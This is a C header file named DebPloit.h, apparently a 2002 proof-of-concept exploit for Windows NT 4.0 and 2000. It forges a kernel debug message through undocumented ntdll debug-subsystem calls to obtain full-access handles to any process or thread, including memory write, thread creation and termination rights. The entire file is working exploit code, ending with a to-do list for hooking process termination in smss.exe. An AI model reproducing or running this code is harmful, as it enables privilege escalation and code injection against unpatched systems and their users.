/* DebPloit.h - get handles to any process, thread 
                on every MS Windows NT 4.0, Windows 2000 (till  Mar-18-2002 ?)

  Alternative "no port" version. Freely according to CSRSRV.dll and ntoskrnl.exe.

  Apr-02-2002 - initial version


*/


////////////////////////////////////////////////////////////////////////////////////////////////

#define KM_CREATE_PROCESS_EVENT 2
#define MAX_DBG_KM_CP_LPC_MESSAGE_SIZE 0x78
#define     DBG_KM_CP_LPC_DATA_SIZE    0x24

typedef struct _DBG_KM_CP_LPC_MESSAGE {
    USHORT DataSize;            //00
    USHORT MessageSize;         //02  
    USHORT MessageType;         //04
    USHORT VirtualRangesOffset; //06
    DWORD  CallerPid;           //08
    DWORD  CallerTid;           //0C
    ULONG  MessageId;           //10
    ULONG  SectionSize;         //14
    DWORD  dwKmDebugEventCode;  //18
    DWORD  Status;              //1C 
    DWORD  Unknown20;           //20
    DWORD  hFile;               //24
    LPVOID lpBaseOfImage;       //28 
    DWORD  dwDebugInfoFileOffset;//2C 
    DWORD  nDebugInfoSize;      //30
    LPVOID lpThreadLocalBase;   //34
    LPTHREAD_START_ROUTINE lpStartAddress; //38
    DWORD  Dummy[(MAX_DBG_KM_CP_LPC_MESSAGE_SIZE - 0x3C)/sizeof(DWORD)]; //3C pro forma
} DBG_KM_CP_LPC_MESSAGE, *PDBG_KM_CP_LPC_MESSAGE;

////////////////////////////////////////////////////////////////////////////////////////////////
//used ntdll.dll's APIs:
#define di __declspec(dllimport)
EXTERN_C di LONG WINAPI DbgSsInitialize(HANDLE hReplyPort, PVOID UiLookUp, PVOID SubsysLookUp, PVOID KmApiFilter);
EXTERN_C di LONG WINAPI DbgUiConnectToDbg(VOID);
EXTERN_C di LONG WINAPI DbgSsHandleKmApiMsg(PDBG_KM_CP_LPC_MESSAGE, HANDLE hEvent);
#undef di

/*//////////////////////////////////////////////////////////////////////////////////////////////
GetProcessThreadHandle can return
  *) handle to ProcessId or
  *) handle to ThreadId or
  *) handles to both ProcessId and ThreadId.

///////////////////////////////////
On success grants handle to
  *) ProcessId the following access: PROCESS_TERMINATE, PROCESS_CREATE_THREAD,
                                     PROCESS_VM_OPERATION, PROCESS_VM_READ,
                                     PROCESS_VM_WRITE, PROCESS_DUP_HANDLE,
                                     PROCESS_QUERY_INFORMATION, READ_CONTROL 

  *) ThreadId the following access:  THREAD_TERMINATE, THREAD_SUSPEND_RESUME,
                                     THREAD_GET_CONTEXT, THREAD_SET_CONTEXT,
                                     THREAD_QUERY_INFORMATION, READ_CONTROL
///////////////////////////////////
Flaws (to solve):
  A) When GetProcessThreadHandle succeeds,
     terminating the debugger's thread kills:
     *) the whole ProcessId if ProcessId was != 0
     *) the ThreadId only, when ProcessId was == 0
     TODO: Detach debugger by doing something in smss.exe process or
           hook NtTerminateProcess/Thread in smss.exe => preserve Target's life.

  B) Other debugger cannot attach to ProcessId, TargetId.

/*//////////////////////////////////////////////////////////////////////////////////////////////

typedef struct _CLIENT_ID { //ntddk
    HANDLE UniqueProcess;
    HANDLE UniqueThread;
} CLIENT_ID;
typedef CLIENT_ID *PCLIENT_ID;

LONG WINAPI UiLookUpRoutine(PCLIENT_ID pDebuggeeCID, PCLIENT_ID pDebuggerCID) {
  pDebuggerCID->UniqueProcess = (HANDLE)GetCurrentProcessId();
  pDebuggerCID->UniqueThread  = (HANDLE)GetCurrentThreadId();
  return(0);
}

BOOL WINAPI GetProcessThreadHandle(
              DWORD   ProcessId, // Target PID, optional (0 if not required)
              DWORD   ThreadId,  // Target TID, optional (0 if not required)
              PHANDLE phProcess, // pointer to handle to ProcessId, optional (NULL if not required)
              PHANDLE phThread   // pointer to handle to ThreadId,  optional (NULL if not required)
            ) {

  BOOL Result = FALSE;

  if(phProcess)
    *phProcess = NULL;
  if(phThread)
    *phThread  = NULL;

  DbgUiConnectToDbg();

  static DbgSsInited = FALSE;
  if(!DbgSsInited) {
    if(DbgSsInitialize(NULL, UiLookUpRoutine, NULL, NULL) < 0)
      return(FALSE);   
    DbgSsInited = TRUE;
  }

  DBG_KM_CP_LPC_MESSAGE DbgKmCpMsg;
  ZeroMemory(&DbgKmCpMsg, sizeof(DbgKmCpMsg));
  DbgKmCpMsg.DataSize = DBG_KM_CP_LPC_DATA_SIZE;
  DbgKmCpMsg.MessageSize = sizeof(DbgKmCpMsg);
  DbgKmCpMsg.MessageType = 8; //kernel message
  DbgKmCpMsg.CallerPid = ProcessId;
  DbgKmCpMsg.CallerTid = ThreadId;
  DbgKmCpMsg.dwKmDebugEventCode = KM_CREATE_PROCESS_EVENT;

  DbgSsHandleKmApiMsg(&DbgKmCpMsg, NULL);
  DEBUG_EVENT DbgEvent; 
  if(WaitForDebugEvent(&DbgEvent, 512)) {
    if(DbgEvent.dwDebugEventCode == CREATE_PROCESS_DEBUG_EVENT) {
      if(phProcess)
        *phProcess = DbgEvent.u.CreateProcessInfo.hProcess;
      if(phThread)
        *phThread  = DbgEvent.u.CreateProcessInfo.hThread;
      if(DbgEvent.u.CreateProcessInfo.hProcess || DbgEvent.u.CreateProcessInfo.hThread)
        Result = TRUE;
    }
  }
  return(Result);
}